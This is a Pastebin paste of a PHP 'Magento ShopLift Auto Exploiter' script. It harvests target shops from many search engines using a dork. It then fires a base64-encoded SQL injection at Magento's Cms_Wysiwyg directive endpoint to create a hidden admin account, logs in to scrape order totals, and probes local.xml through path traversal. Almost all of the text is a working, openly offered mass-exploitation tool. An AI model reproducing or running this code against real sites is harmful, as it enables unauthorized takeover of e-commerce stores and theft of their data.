API tools faq
paste
Guest User

Untitled

a guest
Jun 22nd, 2017
56
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.67 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /* ++++++++++++++++++++++++++++++++++
  3. ShopLift Exploiter Beta Version
  4. Author : FathurFreakz
  5. Use : php thisfile.php "Dork"
  6. YOGYAKARTA BLACK HAT
  7. Special Thanks to
  8. Nabiila Rizqi Khasanah
  9. +++++++++++++++++++++++++++++++++
  10. */
  11. set_time_limit(0);
  12. class ShopLiftFathurFreakz {
  13. private $dork = "";
  14. private $username = "FathurFreakz";
  15. private $password = "w0w1998";
  16.  
  17. public function Dork($dork){
  18. $this->dork = $dork;
  19. return $this->dork;
  20. }
  21.  
  22. private function CurlPost($url, $post = false){
  23. $ch = curl_init();
  24. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  25. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  26. curl_setopt($ch, CURLOPT_URL, $url);
  27. curl_setopt($ch, CURLOPT_HEADER, 0);
  28. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  29. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  30. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  31. if($post !== false){
  32. $isi = '';
  33. foreach($post as $key=>$value){
  34. $isi .= $key.'='.$value.'&';
  35. }
  36. rtrim($isi, '&');
  37. curl_setopt($ch, CURLOPT_URL, $url);
  38. curl_setopt($ch, CURLOPT_POST, count($isi));
  39. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  40. curl_setopt($ch, CURLOPT_POSTFIELDS, $isi);
  41. }
  42. $data = curl_exec($ch);
  43. curl_close($ch);
  44. return $data;
  45. }
  46.  
  47. private function GetStr($start,$end,$string){
  48. $a = explode($start,$string);
  49. $b = explode($end,$a[1]);
  50. return $b[0];
  51. }
  52.  
  53. private function LoginDownloader($url){
  54. $link = parse_url($url);
  55. $data = $this->CurlPost(sprintf("%s://%s/downloader/",$link["scheme"],$link["host"]),
  56. array("username" => $this->username,
  57. "password" => $this->password)
  58. );
  59. if(preg_match("/Log Out/i",$data) || (preg_match("/Return to Admin/i",$data))){
  60. $permission = (!preg_match("/Warning: Your Magento folder does not have sufficient write permissions./i",$data) ? "Writeable" : "Denied");
  61. return "Success\nPermission\t\t: ".$permission;
  62. } else {
  63. return "Failed";
  64. }
  65. }
  66.  
  67. private function LoginAdmin($target){
  68. $link = parse_url($target);
  69. $get = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]));
  70. $key = $this->GetStr("<input name=\"form_key\" type=\"hidden\" value=\"","\" />",$get);
  71. $data = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]),
  72. array("login[username]" => $this->username,
  73. "login[password]" => $this->password,
  74. "form_key" => $key)
  75. );
  76. if($this->LocalFileDiscloure(sprintf("%s://%s",$link["scheme"],$link["host"]))){
  77. return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data)."\nInstaled\t\t:".$this->LocalFileDiscloure(sprintf("%s://%s",$link["scheme"],$link["host"]));
  78. } else {
  79. return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data);
  80. }
  81. }
  82.  
  83. private function ShopLiftExploit($target){
  84. $email = substr(md5(time()),2,15);
  85. $link = parse_url($target);
  86. $data = $this->CurlPost(sprintf("%s://%s/admin/Cms_Wysiwyg/directive/index/",$link["scheme"],$link["host"]),
  87. array("filter" => base64_encode("popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT = 'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{$this->password}') ), CONCAT(':', @SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','{$email}@telekpitekwashere.cok','{$this->username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{$this->username}'),'Firstname');"),
  88. "___directive" => base64_encode("{{block type=Adminhtml/report_search_grid output=getCsvFile}}"),
  89. "forwarded" => "1")
  90. );
  91. return (@imagecreatefromstring($data) !== false);
  92. }
  93.  
  94. private function ExecuteExploit($victim){
  95. $file = fopen("ShopLift-".date("d-m-Y").".log","a");
  96. $url = parse_url($victim);
  97. $target = (!isset($url["scheme"]) ? "http://".$victim : $url["scheme"]."://".$url["host"]);
  98. if($this->ShopLiftExploit($target)){
  99. $downloader = $this->LoginDownloader($target);
  100. $admin = $this->LoginAdmin($target);
  101. $result = "\n============[ShopLift Result]============\nSite\t\t\t: {$target}\nLogin Admin\t\t: {$admin}\nLogin Downloader\t: {$downloader}\n===========================================\n";
  102. fwrite($file,$result);
  103. return $result;
  104. } else {
  105. return "[".date("H:i:s")."] ".$target." => Not vuln !\n";
  106. }
  107. fclose($file);
  108. }
  109.  
  110. private function LocalFileDiscloure($target){
  111. $path = array( "/app/etc/local.xml",
  112. "/magmi/web/download_file.php?file=../../app/etc/local.xml"
  113. );
  114. for($i=0;$i<=count($path);$i++){
  115. $test = $this->CurlPost($target.$path[$i]);
  116. if(isset($test) && preg_match('/install/i',$test) && preg_match('/date/i',$test)){
  117. return $this->GetStr("<date><![CDATA[","]]></date>",$test);
  118. } else {
  119. return false;
  120. }
  121. }
  122. }
  123.  
  124. public function SearchEngine($engine){
  125. $list = array();
  126. $ccbing = array("ca","br","be","nl","uk","it","es","de","no","dk","se","ch","ru","jp","cn","kr","mx","ar","cl","au");
  127. $ccgoogle = array("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm");
  128. $ccask = array("au","uk","ca","de","it","fr","es","ru","nl","pl","at","se","dk","no","br","mx","jp");
  129. $ccyahoo = array("au","ru","at","pl","il","tr","ua","gr","jp","cn","my","id","th","in","kr","tw","ro","za","pt","ca","uk","de","fr","es","it","hk","mx","br","ar","nl","dk","ph","cl","ru","co","fi","ve","nz","pe");
  130. switch($engine){
  131. case 1:
  132. for($i=0;$i<=1000;$i+=10){
  133. $search = $this->CurlPost("http://www.bing.com/search?q=".urlencode($this->dork)."&first=".$i);
  134. preg_match_all('/<a href=\"?http:\/\/([^\"]*)\"/m', $search, $m);
  135. foreach($m[1] as $link){
  136. if(!preg_match("/live|msn|bing|microsoft/",$link)){
  137. if(!in_array($link,$list)){
  138. $list[] = $link;
  139. }
  140. }
  141. }
  142. echo "[".date("H:i:s")."] Catch Bing (".count(array_unique($m[1])).")\n";
  143. }
  144. echo "[".date("H:i:s")."] Total Bing : ".count($list)."\n";
  145. break;
  146. case 2:
  147. for($x=0;$x<=count($ccbing)-1;$x++){
  148. for($i=0;$i<=1000;$i+=10){
  149. $search = $this->CurlPost("http://www.bing.com/search?q=".urlencode($this->dork)."&cc=".$ccbing[$x]."&rf=1&first=".$i."&FORM=PORE");
  150. preg_match_all('/<a href=\"?http:\/\/([^\"]*)\"/m', $search, $m);
  151. foreach($m[1] as $link){
  152. if(!preg_match("/live|msn|bing|microsoft/",$link)){
  153. if(!in_array($link,$list)){
  154. $list[] = $link;
  155. }
  156. }
  157. }
  158. echo "[".date("H:i:s")."] Catch Bing.".$ccbing[$x]." (".count(array_unique($m[1])).")\n";
  159. }
  160. }
  161. echo "[".date("H:i:s")."] Total Bing World : ".count($list)."\n";
  162. break;
  163. case 3:
  164. for($x=0;$x<=count($ccgoogle)-1;$x++){
  165. for($i=0;$i<=200;$i+=10){
  166. $search = $this->CurlPost("http://www.google.".$ccgoogle[$x]."/search?num=50&q=".urlencode($this->dork)."&start=".$i."&sa=N");
  167. preg_match_all('/<a href=\"?http:\/\/([^>\"]*)\//m', $search, $m);
  168. foreach($m[1] as $link){
  169. if(!preg_match("/google/",$link)){
  170. if(!in_array($link,$list)){
  171. $list[] = $link;
  172. }
  173. }
  174. }
  175. echo "[".date("H:i:s")."] Catch Google.".$ccgoogle[$x]." (".count(array_unique($m[1])).")\n";
  176. }
  177. }
  178. echo "[".date("H:i:s")."] Total Google World : ".count($list)."\n";
  179. break;
  180. case 4:
  181. for($x=0;$x<=count($ccask)-1;$x++){
  182. for($i=1;$i<=1000;$i+=100){
  183. $search = $this->CurlPost("http://".$ccask[$x].".ask.com/web?q=".urlencode($this->dork)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
  184. preg_match_all('/href=\"http:\/\/(.*?)\" onmousedown=/m', $search, $m);
  185. foreach($m[1] as $link){
  186. if(!preg_match("/ask\.com/",$link)){
  187. if(!in_array($link,$list)){
  188. $list[] = $link;
  189. }
  190. }
  191. }
  192. echo "[".date("H:i:s")."] Catch Ask.".$ccask[$x]."(".count(array_unique($m[1])).")\n";
  193. }
  194. }
  195. echo "[".date("H:i:s")."] Total Ask World : ".count($list)."\n";
  196. break;
  197. case 5:
  198. for($i=1;$i<=100;$i+=1){
  199. $search = $this->CurlPost("http://search.walla.co.il/?q=".urlencode($this->dork)."&type=text&page=".$i);
  200. preg_match_all('/<a href=\"http:\/\/(.+?)\" title=/m', $search, $m);
  201. foreach($m[1] as $link){
  202. if(!preg_match("/walla\.co\.il/",$link)){
  203. if(!in_array($link,$list)){
  204. $list[] = $link;
  205. }
  206. }
  207. }
  208. echo "[".date("H:i:s")."] Catch Walla (".count(array_unique($m[1])).")\n";
  209. }
  210. echo "[".date("H:i:s")."] Total Walla : ".count($list)."\n";
  211. break;
  212. case 6:
  213. for($i=1;$i<=400;$i+=10){
  214. $search = $this->CurlPost("http://szukaj.onet.pl/".$i.",query.html?qt=".urlencode($this->dork));
  215. preg_match_all('/<a href=\"http:\/\/(.*?)\">/m', $search, $m);
  216. foreach($m[1] as $link){
  217. if(!preg_match("/onet|webcache|query/",$link)){
  218. if(!in_array($link,$list)){
  219. $list[] = $link;
  220. }
  221. }
  222. }
  223. echo "[".date("H:i:s")."] Catch Onet (".count(array_unique($m[1])).")\n";
  224. }
  225. echo "[".date("H:i:s")."] Total Onet : ".count($list)."\n";
  226. break;
  227. case 7:
  228. for($i=1;$i<=50;$i+=1){
  229. $search = $this->CurlPost("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".$i."&q=".urlencode($this->dork)."&st=local");
  230. preg_match_all('/<a href=\"http:\/\/(.*?)\"/m', $search, $m);
  231. foreach($m[1] as $link){
  232. if(!preg_match("/\.sapo\.pt/",$link)){
  233. if(!in_array($link,$list)){
  234. $list[] = $link;
  235. }
  236. }
  237. }
  238. echo "[".date("H:i:s")."] Catch Sapo (".count(array_unique($m[1])).")\n";
  239. }
  240. echo "[".date("H:i:s")."] Total Sapo : ".count($list)."\n";
  241. break;
  242. case 8:
  243. for($i=1;$i<=50;$i+=1){
  244. $search = $this->CurlPost("http://search.lycos.com/web?q=".urlencode($this->dork)."&pn=".$i);
  245. preg_match_all('/title=\"http:\/\/(.*?)\"/m', $search, $m);
  246. foreach($m[1] as $link){
  247. if(!preg_match("/lycos/",$link)){
  248. if(!in_array($link,$list)){
  249. $list[] = $link;
  250. }
  251. }
  252. }
  253. echo "[".date("H:i:s")."] Catch Lycos (".count(array_unique($m[1])).")\n";
  254. }
  255. echo "[".date("H:i:s")."] Total Lycos : ".count($list)."\n";
  256. break;
  257. case 9:
  258. for($i=1;$i<=1000;$i+=10){
  259. $search = $this->CurlPost("http://busca.uol.com.br/web/?ref=homeuol&q=".urlencode($this->dork)."&start=".$i);
  260. preg_match_all('/href=\"?http:\/\/([^\">]*)\"/m', $search, $m);
  261. foreach($m[1] as $link){
  262. if(!preg_match("/uol\.com\.br|\/web/i",$link)){
  263. if(!in_array($link,$list)){
  264. $list[] = $link;
  265. }
  266. }
  267. }
  268. echo "[".date("H:i:s")."] Catch Aol (".count(array_unique($m[1])).")\n";
  269. }
  270. echo "[".date("H:i:s")."] Total Uol : ".count($list)."\n";
  271. break;
  272. case 10:
  273. for($i=1;$i<=300;$i+=20){
  274. $search = $this->CurlPost("http://search.seznam.cz/?q=".urlencode($this->dork)."&count=20&from=".$i);
  275. preg_match_all('/href=\"?http:\/\/([^\">]*)\"/m', $search, $m);
  276. foreach($m[1] as $link){
  277. if(!preg_match("/seznam\.cz|chytrevyhledavani\.cz|smobil\.cz|sklik\.cz/i",$link)){
  278. if(!in_array($link,$list)){
  279. $list[] = $link;
  280. }
  281. }
  282. }
  283. echo "[".date("H:i:s")."] Catch Seznam (".count(array_unique($m[1])).")\n";
  284. }
  285. echo "[".date("H:i:s")."] Total Seznam : ".count($list)."\n";
  286. break;
  287. case 11:
  288. for($i=1;$i<=50;$i+=1){
  289. $search = $this->CurlPost("http://www.hotbot.com/search/web?pn=".$i."&q=".urlencode($this->dork));
  290. preg_match_all('/href=\"http:\/\/(.+?)\" title=/m', $search, $m);
  291. foreach($m[1] as $link){
  292. if(!preg_match("/hotbot\.com/",$link)){
  293. if(!in_array($link,$list)){
  294. $list[] = $link;
  295. }
  296. }
  297. }
  298. echo "[".date("H:i:s")."] Catch Hotbot (".count(array_unique($m[1])).")\n";
  299. }
  300. echo "[".date("H:i:s")."] Total Hotbot : ".count($list)."\n";
  301. break;
  302. case 12:
  303. for($i=1;$i<=300;$i+=10){
  304. $search = $this->CurlPost("http://search.aol.com/aol/search?q=".urlencode($this->dork)."&page=".$i);
  305. preg_match_all('/href=\"http:\/\/(.*?)\"/m', $search, $m);
  306. foreach($m[1] as $link){
  307. if(!preg_match("/aol\.com/",$link)){
  308. if(!in_array($link,$list)){
  309. $list[] = $link;
  310. }
  311. }
  312. }
  313. echo "[".date("H:i:s")."] Catch Aol (".count(array_unique($m[1])).")\n";
  314. }
  315. echo "[".date("H:i:s")."] Total Aol : ".count($list)."\n";
  316. break;
  317. case 13:
  318. for($i=1;$i<=1000;$i+=10){
  319. $search = $this->CurlPost("http://search.yahoo.com/search?p=".urlencode($this->dork)."&b=".$i);
  320. preg_match_all('/<a href=\"http:\/\/(.*?)\"/m', $search, $m);
  321. foreach($m[1] as $link){
  322. if(!preg_match("/yahoo/",$link)){
  323. if(!in_array($link,$list)){
  324. $list[] = $link;
  325. }
  326. }
  327. }
  328. echo "[".date("H:i:s")."] Catch Yahoo (".count(array_unique($m[1])).")\n";
  329. }
  330. echo "[".date("H:i:s")."] Total Yahoo : ".count($list)."\n";
  331. break;
  332. case 14:
  333. for($x=0;$x<=count($ccyahoo)-1;$x++){
  334. for($i=1;$i<=1000;$i+=100){
  335. $search = $this->CurlPost("http://".$ccyahoo[$x].".search.yahoo.com/search;_ylt=A0geu8nrPalPnkQAVmPrFAx.?p=".urlencode($this->dork)."&n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vst=0&vf=all&vc=hk&vm=p&fl=0&fr=yfp-t-501&fp_ip=11&xargs=0&pstart=1&b=".$i);
  336. preg_match_all('/<a href=\"http:\/\/(.*?)\"/m', $search, $m);
  337. foreach($m[1] as $link){
  338. if(!preg_match("/yahoo".$ccyahoo[$x]."/",$link)){
  339. if(!in_array($link,$list)){
  340. $list[] = $link;
  341. }
  342. }
  343. }
  344. echo "[".date("H:i:s")."] Catch Yahoo.".$ccyahoo[$x]." (".count(array_unique($m[1])).")\n";
  345. }
  346. }
  347. echo "[".date("H:i:s")."] Total Yahoo World : ".count($list)."\n";
  348. break;
  349. }
  350. if(count($list)>0){
  351. echo "Exploiting target ".count($list).". Please wait ... \n";
  352. foreach($list as $do){
  353. echo $this->ExecuteExploit($do);
  354. }
  355. }
  356. }
  357.  
  358. public function ExploitLogo(){
  359. $logo = "==================================================\n";
  360. $logo .= "#\t Magento ShopLift Auto Exploiter \t #\n";
  361. $logo .= "#------------------------------------------------#\n";
  362. $logo .= "#\t Author \t: FathurFreakz \t\t #\n";
  363. $logo .= "#\t Email \t\t: fathurfreakz@gmail.com #\n";
  364. $logo .= "#\t Thanks to \t: Nabiila Rizqi K \t #\n";
  365. $logo .= "#\t Usage \t\t: php ".basename($_SERVER["SCRIPT_FILENAME"], '.php').".php \"Dork\"\t #\n";
  366. $logo .= "#------------------------------------------------#\n";
  367. $logo .= "#\t (C) ".date("Y")." YOGYAKARTA BLACK HAT \t\t #\n";
  368. $logo .= "==================================================\n";
  369. echo $logo;
  370. }
  371. }
  372. $Exploiter = new ShopLiftFathurFreakz();
  373. if(isset($argv[1]) && !empty($argv[1])){
  374. if($argv[1]=="-l" && !empty($argv[2])){
  375. $file = file_get_contents($argv[2]);
  376. $list = explode("\n",$file);
  377. if(isset($list)){
  378. echo "Starting engine ....\n";
  379. flush();
  380. sleep(2);
  381. echo "[".date("H:i:s")."] Scanning ".count($list)." dorks. Please wait ... \n";
  382. foreach($list as $dork){
  383. echo "[".date("H:i:s")."] Scanning target for dork : {$dork}\n";
  384. $Exploiter->Dork($dork);
  385. for($i=0;$i<15;$i++){
  386. $Exploiter->SearchEngine($i);
  387. flush();
  388. sleep(1);
  389. }
  390. }
  391. }
  392. } else {
  393. echo "Starting engine ....\n";
  394. flush();
  395. sleep(2);
  396. echo "[".date("H:i:s")."] Scanning target for dork : {$argv[1]}\n";
  397. $Exploiter->Dork($argv[1]);
  398. for($i=0;$i<15;$i++){
  399. $Exploiter->SearchEngine($i);
  400. flush();
  401. sleep(1);
  402. }
  403. }
  404. echo "Scan finished !!!\n";
  405. flush();
  406. sleep(1);
  407. echo "Shuting down engine !!!\n";
  408. } else {
  409. $Exploiter->ExploitLogo();
  410. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!